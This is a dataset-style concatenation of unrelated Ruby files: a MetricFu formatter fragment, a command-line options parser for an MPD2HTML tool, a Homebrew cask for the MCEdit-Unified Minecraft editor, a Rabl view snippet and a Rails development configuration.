def line_for_display(line, line_number)
if MetricFu::Formatter::Templates.option("syntax_highlighting")
line_for_display = convert_ruby_to_html(line, line_number)
else
"<a name='n#{line_number}' href='n#{line_number}'>#{line_number}</a>#{line}"
end
end
def template_directory
File.dirname(__FILE__)
end
end
end
end
| 35.261905 | 207 | 0.649561 |
e92bcdde1e5c0def2743e254027a979de67e8f3a | 1,147 | require 'optparse'
module MPD2HTML
class Options
attr_reader :output_dir, :verbose, :files
def initialize
@output_dir = nil
end
def parse!
parser = OptionParser.new do |op|
op.banner = "Usage: #{$PROGRAM_NAME} -o OUTPUT_DIR [other options] file [...]"
op.on('-o OUTPUT_DIR', "Output directory") do |output_dir|
@output_dir = output_dir
end
op.on('-v', "Verbose") do
@verbose = true
end
# -h and --help work by default, but implement them explicitly so they're
# documented
op.on("-h", "--help", "Prints this help") do
warn op.to_s
exit
end
end
begin
parser.parse!
rescue OptionParser::ParseError
abort parser.to_s
end
if !@output_dir
abort_with_help parser, "Please specify an output directory with -o."
end
if ARGV.empty?
abort_with_help parser, "Please specify one or more input files."
end
@files = ARGV
end
def abort_with_help(parser, message)
abort "#{message}\n#{parser}"
end
end
end
| 22.490196 | 86 | 0.577158 |
5dd7a7cad02df61f1ce0701ef241bfaccd41166e | 468 | cask "mcedit" do
version "1.5.6.0"
sha256 "e2026de3589e3e65086a385ee4e02d607337bc9da11357d1b3ac106e2ee843d7"
url "https://github.com/Podshot/MCEdit-Unified/releases/download/#{version}/MCEdit.v#{version}.OSX.64bit.zip",
verified: "github.com/Podshot/MCEdit-Unified/"
name "MCEdit-Unified"
desc "Minecraft world editor"
homepage "https://www.mcedit-unified.net/"
livecheck do
url :url
strategy :github_latest
end
app "mcedit.app"
end
| 26 | 112 | 0.735043 |
21f8389cc38ef9e8b8394d1a582ab2a09e5edc0b | 154 | attribute :anonymous
extends "api/v1/shopping_cart/partials/items/base"
extends "api/v1/bounties/partials/owner"
extends "api/v1/bounties/partials/issue" | 30.8 | 50 | 0.818182 |
bf8b8ea6c1efcaf48e1dcbd22cb6f1e177e5b871 | 1,974 | Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
config.action_mailer.default_url_options = {host: "localhost", port: 3000}
# In the development environment your application's code is reloaded on
# every request. This slows down response time but is perfect for development
# since you don't have to restart the web server when you make code changes.
config.cache_classes = false
# Do not eager load code on boot.
config.eager_load = false
# Show full error reports.
config.consider_all_requests_local = true
# Enable/disable caching. By default caching is disabled.
if Rails.root.join("tmp/caching-dev.txt").exist?
config.action_controller.perform_caching = true
config.cache_store = :memory_store
config.public_file_server.headers = {
"Cache-Control" => "public, max-age=#{2.days.seconds.to_i}"
}
else
config.action_controller.perform_caching = false
config.cache_store = :null_store
end
# Don't care if the mailer can't send.
config.action_mailer.raise_delivery_errors = false
config.action_mailer.perform_caching = false
# Print deprecation notices to the Rails logger.
config.active_support.deprecation = :log
# Raise an error on page load if there are pending migrations.
config.active_record.migration_error = :page_load
# Debug mode disables concatenation and preprocessing of assets.
# This option may cause significant delays in view rendering with a large
# number of complex assets.
config.assets.debug = true
# Suppress logger output for asset requests.
config.assets.quiet = true
# Raises error for missing translations
# config.action_view.raise_on_missing_translations = true
# Use an evented file watcher to asynchronously detect changes in source code,
# routes, locales, etc. This feature depends on the listen gem.
config.file_watcher = ActiveSupport::EventedFileUpdateChecker
end
| 35.890909 | 85 | 0.762411 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.